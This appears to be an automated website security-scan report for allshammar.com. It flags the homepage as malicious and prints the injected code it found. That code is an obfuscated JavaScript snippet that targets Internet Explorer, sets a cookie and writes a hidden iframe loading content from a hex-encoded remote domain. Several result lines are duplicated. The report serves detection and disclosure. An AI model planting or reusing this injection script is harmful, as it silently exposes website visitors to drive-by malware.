Scanned pages/files
Request | Server response | Status |
http://www.allshammar.com/ | 200 OK Content-Length: 792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sa="%73%64%65%74%77%64%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|'))); Antivirus reports:
| ||
http://www.allshammar.com/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: allshammar.com
Result:
GET / HTTP/1.1
Host: allshammar.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: allshammar.com
Referer: http://www.google.com/search?q=allshammar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: allshammar.com
Referer: http://www.google.com/search?q=allshammar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=allshammar.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://allshammar.com/
Result: allshammar.com is not infected or malware details are not published yet.
Result: allshammar.com is not infected or malware details are not published yet.